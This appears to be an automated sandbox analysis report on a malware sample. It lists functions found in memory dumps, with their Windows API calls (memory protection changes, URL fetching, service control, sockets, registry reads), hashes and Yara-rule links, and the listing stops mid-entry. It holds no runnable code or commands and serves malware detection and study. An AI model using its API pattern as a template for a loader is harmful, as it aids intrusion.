Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: a2b81ebff4308a7cbfa4f0dab8c4be9e2790f6be48b1f0bb987e6c94a365d32d
Instruction ID: 544745a082d340f1a897fdb99acc07c4cca0389ac5b20d95ac1612029ce4d16b
Opcode Fuzzy Hash: a2b81ebff4308a7cbfa4f0dab8c4be9e2790f6be48b1f0bb987e6c94a365d32d
Instruction Fuzzy Hash: E1018B31400644DFDB218F49D985B22FFE0EF08721F08C09ADE884B212D675A418DB62

Uniqueness

Uniqueness Score: -1.00%

Function 01353325, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,013530A5,00000040,01351355,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 01353351

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 378ea3bfe49a2491fd99f0def40954641763d6880cc104be8ae8168ad4ff877b
Instruction ID: b3d3d80254da11ab2ec0c99850552806fda8f151ed31de968a905014445d4ecd
Opcode Fuzzy Hash: 378ea3bfe49a2491fd99f0def40954641763d6880cc104be8ae8168ad4ff877b
Instruction Fuzzy Hash: 9BD0A9E22280002A7C8C8E2CCC44C3B62EA9BD8B3CB20C71DF9AE622C9C8319C004436

Uniqueness

Uniqueness Score: -1.00%

Function 0135219B, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01352181

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2b3bf9adea839c7ac1e29e75f67c9cc27d7e741bbba2c14f14f9fd3ac6b93ca3
Instruction ID: 9cc371fcdc80d1d623284064df4f385c3d818960463b075e0a55ab09d03ffb3a
Opcode Fuzzy Hash: 2b3bf9adea839c7ac1e29e75f67c9cc27d7e741bbba2c14f14f9fd3ac6b93ca3
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1D2E7A10, Relevance: .9, Instructions: 939COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.732273702.000000001D2E0000.00000040.00000001.sdmp, Offset: 1D2E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddbac45e0778f95b4e3a373cf2b81d2bee49ed1861552513ce402abda9f9349d
Instruction ID: 512faaee4fe872c857b79e2461a9ecb1c7c125f8d7280523668987d1ce4f8048
Opcode Fuzzy Hash: ddbac45e0778f95b4e3a373cf2b81d2bee49ed1861552513ce402abda9f9349d
Instruction Fuzzy Hash: 1162F7307487868FDB429B74886476A7FB29F83344F6581E7D158CF2A2DA39DC06C762

Uniqueness

Uniqueness Score: -1.00%

Function 1D2E0860, Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.732273702.000000001D2E0000.00000040.00000001.sdmp, Offset: 1D2E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73075231358cef305a26f60dfb48e26f71210b4ca6fa3d4edc2dbabbcd938dc1
Instruction ID: 74bf69c482622d10a9bf15442a65502241c093a30d074b1a7c66032447287216
Opcode Fuzzy Hash: 73075231358cef305a26f60dfb48e26f71210b4ca6fa3d4edc2dbabbcd938dc1
Instruction Fuzzy Hash: 16D11730B4431A8FD710CFB9C980B6EB7F6EB45340F60886AD569D7391D738E8068B92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2E8AE0, Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.732273702.000000001D2E0000.00000040.00000001.sdmp, Offset: 1D2E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 343bb154099dd6e706aaba30bea0ed4eff5a048d4e4961d0513656cd0e2d025f
Instruction ID: f70f3891e0c46dc5108b28b984acbc0c6c7faf7616d4dcb48662adaed59f099c
Opcode Fuzzy Hash: 343bb154099dd6e706aaba30bea0ed4eff5a048d4e4961d0513656cd0e2d025f
Instruction Fuzzy Hash: A891A034B002059BDB08EB79C854B6EB7E7AFC4241F258529EA16DB394EE74EC018B95

Uniqueness

Uniqueness Score: -1.00%

Function 1DEC247C, Relevance: 14.1, Strings: 11, Instructions: 350COMMON

Download Yara Rule

Strings

rh2, xrefs: 1DEC25D2
r82, xrefs: 1DEC268E
rT., xrefs: 1DEC251E
r\-, xrefs: 1DEC277E
=rH., xrefs: 1DEC2511
rp), xrefs: 1DEC272A
rt', xrefs: 1DEC25A2
r*, xrefs: 1DEC2772
r8(, xrefs: 1DEC254E
r\+, xrefs: 1DEC25AE
r01, xrefs: 1DEC2706

Memory Dump Source

Source File: 00000016.00000002.734388699.000000001DEC2000.00000040.00000001.sdmp, Offset: 1DEC2000, based on PE: false

Similarity

API ID:
String ID: =rH.$r01$r8($r82$rT.$r\+$r\-$rh2$rp)$rt'$r*
API String ID: 0-3557864675
Opcode ID: 7822a3882fada8bf98281cc85b4e8a66a6b292849f4cd6aa4d415ecaa3e62937
Instruction ID: 724dccf4157cf56230e72712e40a99bc9c659667f92657c00ed406e94ebf9c11
Opcode Fuzzy Hash: 7822a3882fada8bf98281cc85b4e8a66a6b292849f4cd6aa4d415ecaa3e62937
Instruction Fuzzy Hash: 88C1256691E3E08FE7134B3889F46853F715B63216B2A0ADBC089CB1E3D90DD94AC713

Uniqueness

Uniqueness Score: -1.00%

Function 202930B8, Relevance: 8.2, APIs: 1, Strings: 3, Instructions: 1217libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 20293310

Strings

:@9r, xrefs: 202933A1
:@9r, xrefs: 2029499E
:@9r, xrefs: 2029457A

Memory Dump Source

Source File: 00000016.00000002.735581028.0000000020290000.00000040.00000001.sdmp, Offset: 20290000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@9r$:@9r$:@9r
API String ID: 2994545307-4278089679
Opcode ID: 1fa80d77e57c0a1bd089e6f32298eb5d96e782997fd3ebca66c0ecb7b90331e0
Instruction ID: ae8e655da78395edce980f0ff7ae5f26e6f0fa91c749603b39ffe711ebac6b1e
Opcode Fuzzy Hash: 1fa80d77e57c0a1bd089e6f32298eb5d96e782997fd3ebca66c0ecb7b90331e0
Instruction Fuzzy Hash: 90C2BA74A106288FCB65DF68DC98A9EBBF2BB48302F5051E6D909E3355DB359E91CF00

Uniqueness

Uniqueness Score: -1.00%

Function 202930E8, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 690libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 20293310

Strings

:@9r, xrefs: 202933A1

Memory Dump Source

Source File: 00000016.00000002.735581028.0000000020290000.00000040.00000001.sdmp, Offset: 20290000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@9r
API String ID: 2994545307-2127026099
Opcode ID: 4ba0a94bb8bb0e06686582d131b6b0a8f72b79a436809b18e89567018c8d60da
Instruction ID: 4d98706bbe8543a070793279364818027020e70b7cb86efaf036333dfd76510d
Opcode Fuzzy Hash: 4ba0a94bb8bb0e06686582d131b6b0a8f72b79a436809b18e89567018c8d60da
Instruction Fuzzy Hash: A072B874A106298FCB61DF64DC88A9ABBF2FB48311F5051E6E909E3351EB359E91CF04

Uniqueness

Uniqueness Score: -1.00%

Function 2029313C, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 680libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 20293310

Strings

:@9r, xrefs: 202933A1

Memory Dump Source

Source File: 00000016.00000002.735581028.0000000020290000.00000040.00000001.sdmp, Offset: 20290000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@9r
API String ID: 2994545307-2127026099
Opcode ID: 3a593e984196c2315422197b3fbd4169f823f19e6a6795d326f7b4f49f6650eb
Instruction ID: 770cb1d1501f16cd1b32e89cc3827648e3d62467ff90bdffd100ff477dcf8feb
Opcode Fuzzy Hash: 3a593e984196c2315422197b3fbd4169f823f19e6a6795d326f7b4f49f6650eb
Instruction Fuzzy Hash: 0172B874A106298FCB61DF64DC88A9ABBF2FB48311F5051E6E909E3351EB359E91CF04

Uniqueness

Uniqueness Score: -1.00%

Function 20293190, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 670libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 20293310

Strings

:@9r, xrefs: 202933A1

Memory Dump Source

Source File: 00000016.00000002.735581028.0000000020290000.00000040.00000001.sdmp, Offset: 20290000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@9r
API String ID: 2994545307-2127026099
Opcode ID: 571a4e2b20afdcbe86597fb720060eb572fbb7b0f5852027a69126f62c904d1f
Instruction ID: 5589d1498cf02ba744b25d98336afaf6833ce78871698e1973338d44af8d278f
Opcode Fuzzy Hash: 571a4e2b20afdcbe86597fb720060eb572fbb7b0f5852027a69126f62c904d1f
Instruction Fuzzy Hash: 0772B774A106298FCB61DF64DC88A9ABBF2FB48301F5051E6E909E3355EB359E91CF04

Uniqueness

Uniqueness Score: -1.00%

Function 202931E4, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 658libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 20293310

Strings

:@9r, xrefs: 202933A1

Memory Dump Source

Source File: 00000016.00000002.735581028.0000000020290000.00000040.00000001.sdmp, Offset: 20290000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@9r
API String ID: 2994545307-2127026099
Opcode ID: e88a2f745c7f046987b1d5b9d9205a2443e62704527cdc1669645a1257889f17
Instruction ID: 0390c93aa0c83fa5d1463c817cc074d23fafd31dbbbfe14fb1795aa0454ee89a
Opcode Fuzzy Hash: e88a2f745c7f046987b1d5b9d9205a2443e62704527cdc1669645a1257889f17
Instruction Fuzzy Hash: D772B874A106298FCB61DF64DC88A9ABBF2FB48301F5051E6E909E3355EB359E91CF04

Uniqueness

Uniqueness Score: -1.00%

Function 01351959, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

`, xrefs: 013519A6

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: c29dfd9544222de9ee11b991a386818d4068ed1dc68e400dc36b5890101ad142
Instruction ID: 6f4163f1d7e6017a894ecc6b6640275666c3e2e623c9ebab2334eb2d73839fe4
Opcode Fuzzy Hash: c29dfd9544222de9ee11b991a386818d4068ed1dc68e400dc36b5890101ad142
Instruction Fuzzy Hash: 461150A1A1134BE9FFB5393C5850FFF21B6DF61EB8F644038EC4A52145CF2884C84591

Uniqueness

Uniqueness Score: -1.00%

Function 01351D29, Relevance: 3.1, APIs: 2, Instructions: 115networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(01352109,00000000,00000000,00000000,00000000), ref: 01351D3F
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 01351DBB

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 0e67716e107e5a5ee19120f0565aa585161bdb56507b276bf3f6c5aa27a51c5c
Instruction ID: 56ead87f48223507806e31083baac0e114078f356251a9640a34d39867a11606
Opcode Fuzzy Hash: 0e67716e107e5a5ee19120f0565aa585161bdb56507b276bf3f6c5aa27a51c5c
Instruction Fuzzy Hash: 0341AB7464038B9AEF716E38CD55FFE36ABAF10BA0F844519ED8DAB5C0E7318544E610

Uniqueness

Uniqueness Score: -1.00%

Function 01351AD5, Relevance: 3.1, APIs: 2, Instructions: 54filelibraryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,01351AB5,01351B35), ref: 01351AFF
LoadLibraryA.KERNEL32(?,321C9581,?,0135303C,01351355,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 01352A16

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID: CreateFileLibraryLoad
String ID:
API String ID: 2049390123-0
Opcode ID: f79907d9e58c71412dcb6d8c2dbe15b26ade1dbf7093b663196ae8bb1e3124f8
Instruction ID: c119ee0de7dabbf422b8982974946305b41d5d4c287051528b7f9988d068d3aa
Opcode Fuzzy Hash: f79907d9e58c71412dcb6d8c2dbe15b26ade1dbf7093b663196ae8bb1e3124f8
Instruction Fuzzy Hash: B601F9B0A1034AF9FF763A785D50FFF2196CF50FB8FA08039FE47551818AA448944551

Uniqueness

Uniqueness Score: -1.00%

Function 1D2E47A7, Relevance: 1.8, APIs: 1, Instructions: 261libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1D2E490D

Memory Dump Source

Source File: 00000016.00000002.732273702.000000001D2E0000.00000040.00000001.sdmp, Offset: 1D2E0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1fd2312f4c07b56895e8801ac7c6d22f0689424d506e93d10b7b4b37abac65b5
Instruction ID: 6f75d81fbe67a8514880c391f1b3366204112736d213d77388da5a1c6267ee24
Opcode Fuzzy Hash: 1fd2312f4c07b56895e8801ac7c6d22f0689424d506e93d10b7b4b37abac65b5
Instruction Fuzzy Hash: F9913730B0838A9FD701DBB4D894A697BF6AF86204F2585BBD105DB292DF34DC06C762

Uniqueness

Uniqueness Score: -1.00%

Function 1D2E1F18, Relevance: 1.7, APIs: 1, Instructions: 202libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1D2E1F58

Memory Dump Source

Source File: 00000016.00000002.732273702.000000001D2E0000.00000040.00000001.sdmp, Offset: 1D2E0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 77d366a6216846082b6d5d01c5268604aeb24fb224c4e9d7ad80b540099b18d1
Instruction ID: 6ce09cf925ef81f7e4dd43e1a952d4bdd08788705977421d519e2d4de3ae70ff
Opcode Fuzzy Hash: 77d366a6216846082b6d5d01c5268604aeb24fb224c4e9d7ad80b540099b18d1
Instruction Fuzzy Hash: 74714D30A0021ACFDB04DFB4C898BAEBBF2AF85355F618529D916EB351DF349941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1D2E48A8, Relevance: 1.7, APIs: 1, Instructions: 155libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1D2E490D

Memory Dump Source

Source File: 00000016.00000002.732273702.000000001D2E0000.00000040.00000001.sdmp, Offset: 1D2E0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 288e0dc18c548761735bfccc25bf3e94437bf282b3b7973fc3aee82f4356abbf
Instruction ID: b9c4754c389a4cc4cf9e9f0ac7c292518700af85b122f1a41ed2d02906c03cc1
Opcode Fuzzy Hash: 288e0dc18c548761735bfccc25bf3e94437bf282b3b7973fc3aee82f4356abbf
Instruction Fuzzy Hash: 89515571B002099BCB44EFB4D994A9EB7F6BF84345F208569E515EB244EF30ED05C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 208C1A81, Relevance: 1.6, APIs: 1, Instructions: 108networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32 ref: 208C1B4A

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 09122067f776a89c00180e06752fd7bf9b8e82a125bdfca555112e98a5b5245f
Instruction ID: 2568e73d84a1b16c8b5045c5654f72471df0f72295acd0591bb9909b93e2abad
Opcode Fuzzy Hash: 09122067f776a89c00180e06752fd7bf9b8e82a125bdfca555112e98a5b5245f
Instruction Fuzzy Hash: 10415C7140D3C0AFE7138B659C94B66BFB4EF07210F0985DBE9848F1A3C365A909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 208C285B, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000EB4), ref: 208C292F

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 599523e150dfa9b95cfb3be5470def413e8f046db58f42cad05fd3af09d67005
Instruction ID: abca347e5c288f5246f28d978b0934838d6777f811560c0fc2fae7017c6bf36f
Opcode Fuzzy Hash: 599523e150dfa9b95cfb3be5470def413e8f046db58f42cad05fd3af09d67005
Instruction Fuzzy Hash: AB31D4B2004344AFF721CB61CC44FA6BFBCEF06710F14899AEA849B192D375A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01352A24, Relevance: 1.6, APIs: 1, Instructions: 94libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,0135303C,01351355,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 01352A16

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 78fc75b6908429776eb9dca18f0922b2e50c7b9d5897b6bd7fcdf804c6183557
Instruction ID: 35005be3a91327a171a202acb773685a1287c3816eb28239e4ee0c10e708efbe
Opcode Fuzzy Hash: 78fc75b6908429776eb9dca18f0922b2e50c7b9d5897b6bd7fcdf804c6183557
Instruction Fuzzy Hash: 7C3171B190021AEFDF65EF28D590AEB37A5EF14B64FA58069EC0A97301D730EC54DA90

Uniqueness

Uniqueness Score: -1.00%

Function 208C2B0D, Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C2BC1

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 36f74cc61a8d426297a1ee674d9b25aecd571e020310abc17590becd63416f99
Instruction ID: d45d3bcdc5a4c7bda380405ea71f8c1924b19c59b0c1fbff0845071e44622104
Opcode Fuzzy Hash: 36f74cc61a8d426297a1ee674d9b25aecd571e020310abc17590becd63416f99
Instruction Fuzzy Hash: 3A318F75009784AFE7228F65DC44F66BFF8EF06710F08849AEA849B162D334E909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0135376A, Relevance: 1.6, APIs: 1, Instructions: 90COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 01353836

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 1e6103536d789c517cb3b3c8fb5086ec58761de84b83233459158619460f3fac
Instruction ID: 8568d8aa7a4ff70fd15eb533db4df9b3f1701257cb4d91a7c71fbe98d35d76e4
Opcode Fuzzy Hash: 1e6103536d789c517cb3b3c8fb5086ec58761de84b83233459158619460f3fac
Instruction Fuzzy Hash: 1721F631A006059EEF5A9EFCD898BA87A91FF45768F99922DCC16C75E1D3B480C8CB40

Uniqueness

Uniqueness Score: -1.00%

Function 208C0C48, Relevance: 1.6, APIs: 1, Instructions: 90fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 208C0CE9

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7698e571674538784ee6d15ed8481e892f44956f32861601fe46bb6da519a68e
Instruction ID: 4abb296849fe2a1466f2ccb87ab9b812ab2c7690cd378d5d4f41363a93a43008
Opcode Fuzzy Hash: 7698e571674538784ee6d15ed8481e892f44956f32861601fe46bb6da519a68e
Instruction Fuzzy Hash: 12319AB1504340AFE722CF65DC44F66BFE8EF45220F0885AEEA858B252D335E909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1DECA8D9, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1DECA989

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8b11c5ab496e8b6e7f5c08810092f83d5b5fc646b59a9eb863fdb31d8eca49a1
Instruction ID: 19a1668d9548d5e1ef84104bf87030880fbd3bc8a4bfe1267ae406828c92402c
Opcode Fuzzy Hash: 8b11c5ab496e8b6e7f5c08810092f83d5b5fc646b59a9eb863fdb31d8eca49a1
Instruction Fuzzy Hash: 7431C372408384AFE7128F24DC85F67FFBCEF06710F09859AE9849B152D224A908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 208C1EC0, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EB4), ref: 208C1F57

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 05dc8eb62b69706f1c4c047cd643abcab57bb70e0a8319b5f9798599ca78b132
Instruction ID: 9c363adffbd6d68a33990d2d2c1d8fb0405289f2250f715b66df09578a3e0c03
Opcode Fuzzy Hash: 05dc8eb62b69706f1c4c047cd643abcab57bb70e0a8319b5f9798599ca78b132
Instruction Fuzzy Hash: E0319172504344AFEB11CB65DC85F67BFF8EF46320F0884AAE984DB152D724E909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1DECB464, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 1DECB4FE

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 4c095b432df37c6e9c87d01a075ed06c718aff1058ff97dcfefa40e30afdece7
Instruction ID: eb7fc2b67a25953fb524053c5221e7fa0371767f2e58b98020cffb4bde76b8bf
Opcode Fuzzy Hash: 4c095b432df37c6e9c87d01a075ed06c718aff1058ff97dcfefa40e30afdece7
Instruction Fuzzy Hash: D031E972409380AFEB128F24DC45F56BFB8EF46314F1884DAE984DF153D2249905CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1DECA9D1, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 1DECAA8C

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c1353424e0e2959a98080c1d0865f29a688f82e4e5461b0db8344574b5f2882d
Instruction ID: 0ae69228fb8f680898ff59902fd4bb0e12630a98bd701ace191dd75fc30c48c0
Opcode Fuzzy Hash: c1353424e0e2959a98080c1d0865f29a688f82e4e5461b0db8344574b5f2882d
Instruction Fuzzy Hash: B331E471109784AFE722CB25CD44F63BFE8EF06310F08849AE985DB153D264E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 208C1DC2, Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C1E6C

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2663a69885d4505c807229322121e6259ee9698e91ca8fe31ae6b59b6436fe8f
Instruction ID: e24e0a05da2e23b32e926762af74c510e84d4d4bed24a4890a4dfd0d42e008dd
Opcode Fuzzy Hash: 2663a69885d4505c807229322121e6259ee9698e91ca8fe31ae6b59b6436fe8f
Instruction Fuzzy Hash: 2B317172509384AFEB12CB65DC84FA3BFB8EF06310F0884DAE985DB153D264E909C761

Uniqueness

Uniqueness Score: -1.00%

Function 208C2158, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 208C220A

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: a8e52d3b7bbdd5d3f348d3bc5c3813004045dbb24edd3d883c55740dc7d246e6
Instruction ID: d2600d45c6bc281c2f7fba4814c080abb0796d61996187556bbb2da55dcdad07
Opcode Fuzzy Hash: a8e52d3b7bbdd5d3f348d3bc5c3813004045dbb24edd3d883c55740dc7d246e6
Instruction Fuzzy Hash: EE31D4B2404384AFE712CB55DC45F96FFF8EF06320F04859AE9849B2A3D375A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 208C240D, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 208C24AD

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 7012f0661108cdb79e5a30f7bac288e4fc9816a0de744a250e040c627b37d0a1
Instruction ID: c9e445c0666b1f6ff0aace9a36e7e87bb3e451edf0ceaf455eae84f9431fb09b
Opcode Fuzzy Hash: 7012f0661108cdb79e5a30f7bac288e4fc9816a0de744a250e040c627b37d0a1
Instruction Fuzzy Hash: C531B4B1509380AFE715CF65DC44F56FFF8EF45610F08849AE9849B292D364E904CB66

Uniqueness

Uniqueness Score: -1.00%

Function 208C288A, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000EB4), ref: 208C292F

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 4fdd7d7ea62a718fd838cdb46f7eb0968e72053704f378ebf547e438499b4509
Instruction ID: 1d330dec5c5c577929850f53c0e15081e05a7c76b6ec4b65d771537b4add8e3e
Opcode Fuzzy Hash: 4fdd7d7ea62a718fd838cdb46f7eb0968e72053704f378ebf547e438499b4509
Instruction Fuzzy Hash: 2821E2B1500304AFFB21DB64DC85FA7FBACEF44710F14896AFA449B181D274E9098B71

Uniqueness

Uniqueness Score: -1.00%

Function 208C12B4, Relevance: 1.6, APIs: 1, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C1350

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 41663847b7b94edd5d52752264ca84c409fa4367c92bae1f87b20afbcb111b84
Instruction ID: 860f8ff28b668388eb3bf6b3954ece92adbecca456cd4e9eeafdba3e21213ce1
Opcode Fuzzy Hash: 41663847b7b94edd5d52752264ca84c409fa4367c92bae1f87b20afbcb111b84
Instruction Fuzzy Hash: D5216171109384AFE7128F65DC44F67BFB8EF46210F08849BE985DB253D224E948C771

Uniqueness

Uniqueness Score: -1.00%

Function 208C11B2, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 208C1246

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 619d66ab1dd4dd3658bf1607082c38ef672397fe35ca247188e957564d79ad0a
Instruction ID: 0b0d76a63bb9cb729c4a619788b37b8b6e24c583bd7c11e93845d58cedb287ea
Opcode Fuzzy Hash: 619d66ab1dd4dd3658bf1607082c38ef672397fe35ca247188e957564d79ad0a
Instruction Fuzzy Hash: 5C217FB2505344AFEB21CF65DC45F6BBFB8EF46610F0884AAEE44DB152D264E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1DECA120, Relevance: 1.6, APIs: 1, Instructions: 83fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000EB4,?,?), ref: 1DECA1C2

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

